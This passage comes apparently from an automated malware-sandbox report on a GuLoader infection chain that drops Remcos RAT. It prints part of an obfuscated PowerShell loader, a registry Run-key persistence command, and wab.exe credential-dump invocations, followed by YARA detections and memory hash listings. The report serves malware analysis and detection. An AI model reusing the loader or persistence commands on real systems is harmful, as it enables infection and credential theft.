') ;Oraklerne (Bortledede 'Bi t$KlimgStamlTempofngeb,ndeaDi clTaxa:H,reF D so ForrTu ksBagtiUdstk.frerskakiAjstn dengSub,sUnisuN ned MicgEngii,sylf.lagt ipe= .de$SoldgGyrol elvo TegbK.olaAntilColl:MunkJCabauOlied ,tnaSig iGowfs denmGaule .ff+gorg+I.ra% Ko,$RehnDOr.eiMetasBatcpFinaoTalmnGebeePol,n fo,tAcoee GlonPellhPhotePredd SeieGastn Apo.ImoecVerboSnoluT,kenForetColl ') ;$Renprisen=$Disponentenheden[$Forsikringsudgift];}Oraklerne (Bortledede ' Ho.$Bit.g CerlUdlaoOv rbRepea T,plPl t:S bnSDelfy NedvFlngaH,fta CobrBoarsPam.dHa lr Bree Cirn Speg oseCons skri=Bis. NickGCrype TvitReco-DitrC OveoUdginBagatPonde D.sn UnctEter Gen$Fo.uNspise Bugv D ciDobblSylll,ryge Eles mo, ');Oraklerne (Bortledede 'Beun$VaaggImp lNiu oO llbTrttabojal Smo:AnalD A.meLangcUnhooH mmmArrhpQ.anrO.spe libsOb asUniniPostvS aae Dek Un e=Havf Pelo[ arcSParky ddysselvtRet.eAflamFyrp.CompCmejso Vren SynvP,oteAarsrSnortFaxe]excu: rd:SkraFDolkr I,soHoflm ayeBAf.oa UdlsPseueS aa6Robo4OxydSMunitProsrBrakiSkuen ExcgBria(Band$UdlaSUnsyyMothv ph,a .isaMun.r Fols Svad ud r .ave ResnOutbgD iveA.da)Inge ');Oraklerne (Bortledede ' aci$Overg Aabl ibroCe,tbStj.a D,nlForl:SextSFanta,rimaIncomCouna .chsHammk,rskiOplanCh,leFllesPara Wood= Han Cu v[ .prSDemoy,rops FirtSp deUform K.m. KapT CaceSl,axNonitThe..Vas EAr enTermc .loo ,ondundeiRippnredegDoo,]Dise:Imbe:BeelAReseSBeskCT ocIUndiI Op.. gleGYasheHositPo,lSKundtModsrEpuli,lagnUnw.gSyn.( dr$ .asDHenhePlaucsengoAn um SubpTararAcc eFilmsThussNutmi Uidv.alle Se )Unso ');Oraklerne (Bortledede 'Skol$e fogCroolLorgoFli,bFlueaCu wlGrun:DimpE.anscHannoUn,onFireoEnstm TiliP,riz PhiaLongtTilli,anio,eadnOutl=Fore$barnSf eea kroa hopmRetaaPrecsSydvkChemi,mstn ueleT,lhsVeri.MechsBasiu SkibPlaysP,pitDiskrSi.aiConcnSa igDelo(Reco3,urv2Ting4 Cau8Hydr1Lame0Chem,Slb.2Sun 7,jae9Sukk2 Ove5Kl.g)Skel ');Oraklerne $Economization;"
                                                                                                              Imagebase:0x7a0000
                                                                                                              File size:433'152 bytes
                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2590409597.0000000008570000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2584352581.0000000005919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2590524362.0000000008E66000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:6
                                                                                                              Start time:01:14:13
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"
                                                                                                              Imagebase:0x790000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:7
                                                                                                              Start time:01:14:14
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                                                                              Imagebase:0x7ff715980000
                                                                                                              File size:3'242'272 bytes
                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:8
                                                                                                              Start time:01:14:14
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2420,i,2104451589269232737,4580126100320580491,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                              Imagebase:0x7ff715980000
                                                                                                              File size:3'242'272 bytes
                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:10
                                                                                                              Start time:01:14:47
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                                              Imagebase:0x7d0000
                                                                                                              File size:516'608 bytes
                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:moderate
                                                                                                              Has exited:false

                                                                                                              Target ID:13
                                                                                                              Start time:01:14:56
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"
                                                                                                              Imagebase:0x790000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:14
                                                                                                              Start time:01:14:56
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:15
                                                                                                              Start time:01:14:56
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"
                                                                                                              Imagebase:0xb30000
                                                                                                              File size:59'392 bytes
                                                                                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              Target ID:16
                                                                                                              Start time:01:15:05
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtfhsudaxgbogptlufigqqhs"
                                                                                                              Imagebase:0x7d0000
                                                                                                              File size:516'608 bytes
                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:17
                                                                                                              Start time:01:15:05
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
                                                                                                              Imagebase:0x7d0000
                                                                                                              File size:516'608 bytes
                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:18
                                                                                                              Start time:01:15:05
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
                                                                                                              Imagebase:0x7d0000
                                                                                                              File size:516'608 bytes
                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:19
                                                                                                              Start time:01:15:05
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
                                                                                                              Imagebase:0x7d0000
                                                                                                              File size:516'608 bytes
                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:20
                                                                                                              Start time:01:15:05
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
                                                                                                              Imagebase:0x7d0000
                                                                                                              File size:516'608 bytes
                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:21
                                                                                                              Start time:01:15:06
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
                                                                                                              Imagebase:0x7d0000
                                                                                                              File size:516'608 bytes
                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:22
                                                                                                              Start time:01:15:06
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
                                                                                                              Imagebase:0x7d0000
                                                                                                              File size:516'608 bytes
                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                                • Instruction ID: b8a3093f9d47fe9803fd5b0a09404c99d1cd1cc9ceca47b670e66df3feb4720b
                                                                                                                • Opcode Fuzzy Hash: da6dd239b77ba15b8e422fde03e2273976fe28338e8d96ba5c80ef5fe3bd279e
                                                                                                                • Instruction Fuzzy Hash: 11227234B002549FCB65DB24C854AAEB7B2FF89304F1484EAE50AAB361DF359D85CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $]q$$]q
                                                                                                                • API String ID: 0-127220927
                                                                                                                • Opcode ID: 02470376fd658b3517bc06367e86648194f8ec391d58fcc6567ba65a28aa5447
                                                                                                                • Instruction ID: 82198994f0c72751a4fb970e04a2648c67a4f45f5e46a41156965650c19fc349
                                                                                                                • Opcode Fuzzy Hash: 02470376fd658b3517bc06367e86648194f8ec391d58fcc6567ba65a28aa5447
                                                                                                                • Instruction Fuzzy Hash: D411C270620114DFDB39DB28C550ABDBBA2FB85714F608626E8016F270E776DD60CBB1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 27b1aaf8190add0a0524ae81a470281648b845c9299774c77bf920226098435e
                                                                                                                • Instruction ID: bc0f88dc294a80ca7071ad773236218a0fcb29fa69a99946f5ad6f8ed6f8553c
                                                                                                                • Opcode Fuzzy Hash: 27b1aaf8190add0a0524ae81a470281648b845c9299774c77bf920226098435e
                                                                                                                • Instruction Fuzzy Hash: 26423874A002099FCB15CFA8D594AEEBBF2FF88314F248559E855AB365C735EC81CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a42ac0d3947765c2c8e41d7fb18ef4fd08bc37d6c479e75cd86fa91a835827e4
                                                                                                                • Instruction ID: 1f87857c97c00e584c3588817f90ace3e38cb85180447229b1691a155b0662c5
                                                                                                                • Opcode Fuzzy Hash: a42ac0d3947765c2c8e41d7fb18ef4fd08bc37d6c479e75cd86fa91a835827e4
                                                                                                                • Instruction Fuzzy Hash: 25E114386002009FCB08DF78D594EAD77F6FF89714B6085A9E9069B3A5DB75EC41CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 60183fb2a25c2d9d997cdd6f1d8d5964924eef442171878f48b9c912f08e694f
                                                                                                                • Instruction ID: 0498c5b31cae9c957ea4c6bcd7d96e520b4fadeb28438da14ed4daf353f8a26a
                                                                                                                • Opcode Fuzzy Hash: 60183fb2a25c2d9d997cdd6f1d8d5964924eef442171878f48b9c912f08e694f
                                                                                                                • Instruction Fuzzy Hash: F8C1B035A00248DFCF14DFA4D584AADBBB6FF85318F16815AE506AB365DB34EC49CB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d3fbee4f309b1cbe49222208b2f1612d7e1cad95c45c34f58b192574edc38bbe
                                                                                                                • Instruction ID: 4232277415f42cacc79aeba2f80256dd3c51c68d44f94b28a93ee9942f5d0c53
                                                                                                                • Opcode Fuzzy Hash: d3fbee4f309b1cbe49222208b2f1612d7e1cad95c45c34f58b192574edc38bbe
                                                                                                                • Instruction Fuzzy Hash: 59D11774A01249AFDB45CFA8D584A9DFBF2FF88310F248199E845AB365C731ED45CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 712cc8f8b4341be750bb078ef743c259a32c97fcd9989c3c6ae9e5876b0a0408
                                                                                                                • Instruction ID: 2b38508692ac45d9c2312b0bb1a44e81b33e412a12fe991836a661dadc87284c
                                                                                                                • Opcode Fuzzy Hash: 712cc8f8b4341be750bb078ef743c259a32c97fcd9989c3c6ae9e5876b0a0408
                                                                                                                • Instruction Fuzzy Hash: EA919D70A04245DFCB06CF5DC894AAEBBF1FF49314B25859AE855AB3A5C335EC41CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 73c4105f27db037977d8980c5449f1b047e3f52b90a9ca0bee42bf0990525f5b
                                                                                                                • Instruction ID: 7f764997ed19c269778990b6e5d15cb4d210948d607da3e87b7cc86ae2b2884f
                                                                                                                • Opcode Fuzzy Hash: 73c4105f27db037977d8980c5449f1b047e3f52b90a9ca0bee42bf0990525f5b
                                                                                                                • Instruction Fuzzy Hash: 7E717C35A012449FCB15CFA4C894DADBBF2FF89314F1884A9E445AB362DB35EC86CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2e1a2fe4a986913293a9c1718a570fe5ea17360125e97e80500fd196b8a650a2
                                                                                                                • Instruction ID: 3e53a6937f515a2a2743af7f4829d6064722240a9853880ded6e784a5f08d4cc
                                                                                                                • Opcode Fuzzy Hash: 2e1a2fe4a986913293a9c1718a570fe5ea17360125e97e80500fd196b8a650a2
                                                                                                                • Instruction Fuzzy Hash: 14714930E002489FDF14DFA4D484BADBBF6BF89704F149529E406AB3A4DB75AC46DB81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 46660899c0c3cc10a3debb7b76dec878b655d16e6ff1165d9c16418e9466d9df
                                                                                                                • Instruction ID: dd0ce26dca54a802af4573aace07ef740d9cd51624c6c3c5f45f63e368d8f50a
                                                                                                                • Opcode Fuzzy Hash: 46660899c0c3cc10a3debb7b76dec878b655d16e6ff1165d9c16418e9466d9df
                                                                                                                • Instruction Fuzzy Hash: BE516F30A002049FCB14DFA9D944B9DBBF6FF89314F118469E016EB764DB75AC45CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8c5da26bae9cdb1734a2044d63c5a55ba9a3a520c133f1f3255fd3d6b1e75c87
                                                                                                                • Instruction ID: 14f70ca46547853adf32c1c3135c650147081da3c139b6d370e1961a4b5488a3
                                                                                                                • Opcode Fuzzy Hash: 8c5da26bae9cdb1734a2044d63c5a55ba9a3a520c133f1f3255fd3d6b1e75c87
                                                                                                                • Instruction Fuzzy Hash: 18613C34E002499FCB14DFA4D584AADBBB2BF85704F158558E402AF369DB78ED89DB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ade1cdb05579b37544be65c38bb4b6ab99e3d2983b8935ccc42caa5576b12e32
                                                                                                                • Instruction ID: 87feb7c20bac39f6172ce8872cd2925a567783b4c165b9fbdaebbc21053474e5
                                                                                                                • Opcode Fuzzy Hash: ade1cdb05579b37544be65c38bb4b6ab99e3d2983b8935ccc42caa5576b12e32
                                                                                                                • Instruction Fuzzy Hash: 38612D34E002499FCB14DFA4D544AADBBB2BF85704F158558E402EF369DB78ED89DB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 752d389c32b7924fbf6da13f0ffdede17e16b251c7846c881ff08f0a638b3b2d
                                                                                                                • Instruction ID: ac851a8e4cbb409bbfd94e88ff5bbcac889137dd945f986c1fc6abd91d6a49c6
                                                                                                                • Opcode Fuzzy Hash: 752d389c32b7924fbf6da13f0ffdede17e16b251c7846c881ff08f0a638b3b2d
                                                                                                                • Instruction Fuzzy Hash: 4B41F1B1A04312DFDB319F28C551AA97BA2BF86255F6480A7C804DB261D732CD46CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1ac05e993d85571ace7f7299bb5678129995cc45eaa24aa635faf618c3d473f5
                                                                                                                • Instruction ID: 3a377c4931ead7ef753cd59453c6a9048022a1fd9d46c3636a80d03973092714
                                                                                                                • Opcode Fuzzy Hash: 1ac05e993d85571ace7f7299bb5678129995cc45eaa24aa635faf618c3d473f5
                                                                                                                • Instruction Fuzzy Hash: 89416F30E00608DFDB24DFA9C444BADBBB6FF85314F148969E406AB764DB75AC45DB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 91d590bb79f33ef29ac969bdb29edf629b80d76adf88c1fd14ad7b62cb5db683
                                                                                                                • Instruction ID: c5ef205db8736851a673c36de90cc7e915db536aa5720e0b002fd612414d7508
                                                                                                                • Opcode Fuzzy Hash: 91d590bb79f33ef29ac969bdb29edf629b80d76adf88c1fd14ad7b62cb5db683
                                                                                                                • Instruction Fuzzy Hash: 1F414A31B002048FDB28DF64D958AAE7BB6EF9C755F194469E406EB3A4DB30AC45CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 361d06597efd9f7095599c5f8dbd84169ea4eb37814ed779fa07ef2b5385290f
                                                                                                                • Instruction ID: 2091481bfbd8b659570ba63e25bde85ca3f065d05dbf9149d3471b24d793597c
                                                                                                                • Opcode Fuzzy Hash: 361d06597efd9f7095599c5f8dbd84169ea4eb37814ed779fa07ef2b5385290f
                                                                                                                • Instruction Fuzzy Hash: 21413D70A052458FCB05CF6CC9909A9BBF1FF4A310B2A86DAE445DB762C731AD55CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0d6c284510ddc44902ae7214aaf61328ce1fbcdc9983964c1968993d3668f747
                                                                                                                • Instruction ID: e251b30926c1433802ad6898b4be411d2bd42605a741967aa5fe83aff5f150b8
                                                                                                                • Opcode Fuzzy Hash: 0d6c284510ddc44902ae7214aaf61328ce1fbcdc9983964c1968993d3668f747
                                                                                                                • Instruction Fuzzy Hash: 35410674A00505DFCB09CF99C598EAAFBB1FF48314B1585AAD805AB365C732FC90CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
